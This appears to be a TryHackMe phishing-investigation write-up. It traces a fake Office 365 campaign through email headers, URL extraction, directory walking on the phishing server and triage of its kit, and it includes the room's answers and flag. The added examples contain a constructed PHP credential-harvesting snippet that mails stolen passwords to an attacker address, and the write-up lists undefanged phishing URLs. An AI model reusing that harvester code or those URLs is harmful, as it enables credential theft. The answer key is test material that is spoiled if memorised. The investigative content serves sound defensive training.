A collection of my write-ups for TryHackMe, HackTheBox, and other CTF challenges
Note: The phishing emails to be analysed are under the phish-emails directory on the Desktop. Usage of a web browser, text editor and some knowledge of the grep command will help.
Who is the individual who received an email attachment containing a PDF?
Open a terminal in that directory, then search for the file that contains the PDF attachment. This can be done with the command

grep -l 'name=".*\.pdf"' *.eml

(\. matches the literal dot before the extension; an unescaped . would match any character.) This returns the name of the .eml file that has a PDF attachment. To find out who received that PDF, the result is piped through xargs so that grep prints the To: header of that file:

grep -l 'name=".*\.pdf"' *.eml | xargs -d '\n' grep -h "^To:"
William McClean
What email address was used by the adversary to send the phishing emails?
The sender of every file can be displayed with grep as well:

grep -h -A 1 "^From:" *.eml

where
-h hides the file name in the output
-A prints each matching line together with the lines after it; the number that follows sets how many
1 is that number, so one line after each From: match is shown in case the header wraps onto a second line
Accounts.Payable@groupmarketingonline.icu
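The same two lookups (who received the PDF, which address sent everything) done with Python's standard-library email parser instead of grep. This is an added example, not code from the original write-up; the two .eml bodies are constructed stand-ins that only reuse the names and addresses already quoted above (subjects, boundaries and bodies are made up). The parser also copes with folded headers and RFC 2231/2047-encoded filenames, which a regex on name="..." can miss.

```python
"""Find who received the PDF and which address sent the phish, using the
stdlib email parser instead of grep. Added example; the messages below are
constructed, not the room's real files."""
import email
from email import policy

# Constructed sample messages keyed by file name (NOT the room's real files).
SAMPLE_EMLS = {
    "invoice.eml": """\
From: Accounts.Payable@groupmarketingonline.icu
To: William McClean <william.mcclean@swiftspend.finance>
Subject: Invoice attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached invoice.
--b1
Content-Type: application/pdf; name="invoice.pdf"
Content-Disposition: attachment; filename="invoice.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b1--
""",
    "update.eml": """\
From: Accounts.Payable@groupmarketingonline.icu
To: Zoe Duncan <zoe.duncan@swiftspend.finance>
Subject: Mailbox update required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

Open the attachment to update your mailbox.
--b2
Content-Type: text/html; name="update.html"
Content-Disposition: attachment; filename="update.html"

<html><body>update</body></html>
--b2--
""",
}


def parse_eml(text):
    """Parse raw RFC 822 text; policy.default gives decoded, structured headers."""
    return email.message_from_string(text, policy=policy.default)


def attachment_names(msg):
    """File names of every MIME part that is not the message body."""
    return [p.get_filename() for p in msg.iter_attachments() if p.get_filename()]


def recipients_of_attachment(emls, suffix=".pdf"):
    """Map file name -> To: header for every message carrying an attachment
    whose name ends in `suffix` (the grep -l ... | xargs grep '^To:' step)."""
    hits = {}
    for name, text in emls.items():
        msg = parse_eml(text)
        if any(fn.lower().endswith(suffix) for fn in attachment_names(msg)):
            hits[name] = str(msg["To"])
    return hits


def sender_addresses(emls):
    """Set of bare addr-specs from the From: header of every message
    (the grep -h -A 1 '^From:' step, without display-name noise)."""
    senders = set()
    for text in emls.values():
        msg = parse_eml(text)
        senders.update(a.addr_spec for a in msg["From"].addresses)
    return senders


if __name__ == "__main__":
    print(recipients_of_attachment(SAMPLE_EMLS))          # the PDF recipient
    print(recipients_of_attachment(SAMPLE_EMLS, ".html")) # who got the HTML lure
    print(sender_addresses(SAMPLE_EMLS))                  # the adversary's address
```

Point it at the real directory by reading each *.eml into the dictionary (`{p.name: p.read_text() for p in Path(".").glob("*.eml")}`); the functions do not care where the text came from.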
What is the redirection URL to the phishing page for the individual Zoe Duncan? (defanged format)
For this question, we have to open the email sent to Zoe and save the attached HTML file so we can inspect it.
Now the HTML file must be searched for any URL inside it, which can be done with the command

grep -o 'http[^" ]*' *.html

(-o prints only the matching part, so the URL comes out on its own rather than the whole line around it)
So the URL is:
http://kennaroads.buzz/data/Update365/office365/40e7baa2f826a57fcf04e5202526f8bd/?email=zoe.duncan@swiftspend.finance&error
This URL has to be defanged as the question requires, so CyberChef's Defang URL operation was used:
hxxp[://]kennaroads[.]buzz/data/Update365/office365/40e7baa2f826a57fcf04e5202526f8bd/?email=zoe[.]duncan@swiftspend[.]finance&error
What is the URL to the .zip archive of the phishing kit? (defanged format)
The phishing URL sent to Zoe has a path specific to her, but if we strip the user-specific part the server may show us a directory listing of the files it is hosting
so for the link:
http://kennaroads.buzz/data/Update365/office365/40e7baa2f826a57fcf04e5202526f8bd/?email=zoe.duncan@swiftspend.finance&error
we keep only the leading path:
http://kennaroads.buzz/data/Update365/
There is no .zip file in that listing, so we go up one more level to:
http://kennaroads.buzz/data
which shows us the listing of the data directory
Now, we can clearly see the .zip archive of the phishing kit, which is Update365.zip
so the link we are looking for is:
http://kennaroads.buzz/data/Update365.zip
defang this URL using CyberChef:
hxxp[://]kennaroads[.]buzz/data/Update365[.]zip
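The three URL steps above (pull the redirect out of the HTML, defang it, walk the path back up to the directories the kit is served from) as one script. This is an added example, not code from the original write-up: HTML_LURE is a constructed stand-in for Zoe's attachment (a meta refresh plus a JavaScript redirect, both pointing at the URL quoted above), and `defang` reproduces what CyberChef's Defang URL operation does to that URL.

```python
"""Extract, defang and 'walk up' the phishing URL. Added example; HTML_LURE
is constructed, not the real attachment."""
import re
from urllib.parse import urlsplit, urlunsplit

LURE_URL = ("http://kennaroads.buzz/data/Update365/office365/"
            "40e7baa2f826a57fcf04e5202526f8bd/?email=zoe.duncan@swiftspend.finance&error")

# Constructed HTML attachment (NOT the real file from the room).
HTML_LURE = f"""<html><head>
<meta http-equiv="refresh" content="0; url={LURE_URL}">
</head><body>
<script>window.location.href = "{LURE_URL}";</script>
</body></html>"""

# Same idea as grep 'http[^ ]', but also stops at quote and angle-bracket delimiters.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def extract_urls(html):
    """Unique http(s) URLs in order of first appearance."""
    found = []
    for m in URL_RE.finditer(html):
        if m.group(0) not in found:
            found.append(m.group(0))
    return found


def defang(url):
    """CyberChef 'Defang URL': http -> hxxp, :// -> [://], . -> [.]"""
    url = re.sub(r"^http", "hxxp", url)
    return url.replace("://", "[://]").replace(".", "[.]")


def refang(text):
    """Inverse of defang, for when an IOC has to be used again."""
    text = text.replace("[://]", "://").replace("[.]", ".")
    return re.sub(r"^hxxp", "http", text)


def parent_dirs(url):
    """Directory URLs above `url`, deepest first, with the query string dropped.
    This is the 'remove the user-specific part of the path' step done
    systematically: each entry is a candidate for a directory listing."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    dirs = []
    for depth in range(len(segments), -1, -1):
        path = "/" + "/".join(segments[:depth])
        if depth:
            path += "/"
        dirs.append(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return dirs


if __name__ == "__main__":
    for u in extract_urls(HTML_LURE):
        print(defang(u))
        for d in parent_dirs(u):
            print("  ", defang(d))
```

`parent_dirs` gives `.../data/Update365/` and `.../data/` among its results, which are exactly the two listings visited above; when no directory brute-forcer is available, pairing that list with a couple of guessed file names is the manual equivalent of what a tool like Gobuster would do.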
What is the SHA256 hash of the phishing kit archive?
Download Update365.zip into the phish-emails directory, then run in the terminal:
sha256sum Update365.zip
ba3c15267393419eb08c7b2652b8b6b39b406ef300ae8a18fee4d16b19ac9686
When was the phishing kit archive first submitted? (format: YYYY-MM-DD HH:MM:SS UTC)
VirusTotal, the popular online file-scanning service, is the best option for this.
In my browser, I visited the VirusTotal page, inserted the archive's SHA256 hash to scan it, and easily saw the submission date
2020-04-08 21:55:50 UTC
What was the email address of the user who submitted their password twice?
The best way to track login attempts is through the kit's logs, and from the previous questions we already know where the hosted files are,
so back again to:
http://kennaroads.buzz/data
where a log.txt file is listed. Open it and look for an email address that appears twice, i.e. the same user submitting a password twice
michael.ascot@swiftspend.finance
What was the email address used by the adversary to collect compromised credentials?
To find this we have to look deeper into the phishing kit archive, so head back to the hosted file at:
http://kennaroads.buzz/data/Update365.zip
Download Update365.zip, then move it into the phish-emails directory so it can be investigated there, using the command
mv ~/Downloads/Update365.zip .
Then Unzip it using the command
unzip Update365.zip
The file that collects the credentials and sends them onwards will almost certainly contain the word "send" somewhere and sit inside the Update365 folder, so search for files containing that keyword with

grep -ril "send" Update365

(-l lists only file names, -i ignores case; note that a pattern starting with * is taken literally by grep, so "*send" would not find anything)
Among the results is submit.php, the file that handles the form's submit button. To look further into it, we print it with cat.
Here another suspicious address is found; it is the one the captured responses are sent to:
m3npat@yandex.com
The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in “@gmail.com”?
This one is easy: just search the kit for an address that ends with @gmail.com, for example with

grep -rho '[A-Za-z0-9._%+-]*@gmail\.com' Update365 | sort -u
jamestanner2299@gmail.com
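The kit-side steps above (hash the archive, find where submit.php mails the credentials, list every address on a given domain, and find the user who appears twice in log.txt) as one offline triage script. This is an added example, not code from the original write-up or from the kit itself: the archive is built in memory as a constructed stand-in for Update365.zip. The PHP source, the config.php file name, the office365/ subdirectory and the log.txt line format (email|password|ip, which the write-up does not show) are all assumptions; only the names submit.php and log.txt and the addresses already quoted above are taken from the write-up.

```python
"""Offline triage of a phishing-kit archive. Added example; the kit contents
below are constructed, not the real Update365 code."""
import hashlib
import io
import re
import zipfile
from collections import Counter

# --- constructed kit contents (NOT the real Update365 code) ---
SUBMIT_PHP = r'''<?php
$email = $_POST['email'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$msg = "Email: $email\nPassword: $password\nIP: $ip\n";
$send = "m3npat@yandex.com";
mail($send, "Office365 Result", $msg);
file_put_contents("../log.txt", "$email|$password|$ip\n", FILE_APPEND);
header("Location: https://www.office.com/");
'''
CONFIG_PHP = r'''<?php
// hypothetical second file carrying another operator address
$owner = "jamestanner2299@gmail.com";
'''
LOG_TXT = (  # assumed format: email|password|ip, one submission per line
    "zoe.duncan@swiftspend.finance|pw-1|203.0.113.5\n"
    "michael.ascot@swiftspend.finance|pw-2|203.0.113.9\n"
    "michael.ascot@swiftspend.finance|pw-3|203.0.113.9\n"
    "william.mcclean@swiftspend.finance|pw-4|198.51.100.7\n"
)

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# first argument of mail(): a $variable or a quoted literal
MAIL_CALL_RE = re.compile(r"""mail\s*\(\s*(\$\w+|"[^"]*"|'[^']*')""")


def build_kit_zip():
    """Zip the constructed kit in memory (stands in for the downloaded archive)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Update365/office365/submit.php", SUBMIT_PHP)
        zf.writestr("Update365/office365/config.php", CONFIG_PHP)
        zf.writestr("Update365/log.txt", LOG_TXT)
    return buf.getvalue()


def sha256_hex(data):
    """Same digest sha256sum prints; this is the value to look up on VirusTotal."""
    return hashlib.sha256(data).hexdigest()


def php_sources(zip_bytes):
    """name -> source for every .php member (the unzip + grep -r step, in memory)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {n: zf.read(n).decode("utf-8", "replace")
                for n in zf.namelist() if n.endswith(".php")}


def mail_recipients(php):
    """Addresses that mail() sends to; a $var argument is resolved through its
    `$var = "..."` assignment in the same file."""
    recipients = set()
    for m in MAIL_CALL_RE.finditer(php):
        arg = m.group(1)
        if arg.startswith("$"):
            assign = re.search(re.escape(arg) + r"""\s*=\s*["']([^"']+)["']""", php)
            if assign:
                recipients.add(assign.group(1))
        else:
            recipients.add(arg.strip("\"'"))
    return recipients


def addresses_by_domain(php_files, domain):
    """Every address on `domain` anywhere in the kit (the grep -r '@gmail.com' step)."""
    return sorted({a for src in php_files.values() for a in EMAIL_RE.findall(src)
                   if a.lower().endswith("@" + domain.lower())})


def repeat_submitters(log_text, sep="|"):
    """Addresses that appear on two or more log lines (the user who submitted twice)."""
    counts = Counter(line.split(sep)[0].strip().lower()
                     for line in log_text.splitlines() if sep in line)
    return sorted(addr for addr, n in counts.items() if n >= 2)


if __name__ == "__main__":
    kit = build_kit_zip()
    print("sha256:", sha256_hex(kit))
    php = php_sources(kit)
    for name, src in php.items():
        print(name, "mails to", mail_recipients(src))
    print("gmail addresses:", addresses_by_domain(php, "gmail.com"))
    print("submitted twice:", repeat_submitters(LOG_TXT))
```

Against the real download, replace `build_kit_zip()` with `Path("Update365.zip").read_bytes()`; the rest of the pipeline reads the archive in memory, so nothing is extracted to disk and no PHP is ever executed. `mail_recipients` only follows a simple `$var = "..."` assignment; kits that build the address from concatenation or base64 need the source read by hand, which is why it is still worth opening submit.php with cat.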
What is the hidden flag?
Reading the instructions for this one:
Then the flag is a text file that is a subdomain or a directory of the phishing URL; since there is no enumeration tool like Gobuster in the VM, I guessed it is called flag.txt
so I tried this directory in the URL:
So the flag is found, but it seems to be encoded. For that we use CyberChef to decode it back:
THM{pL4y_w1Th_tH3_URL}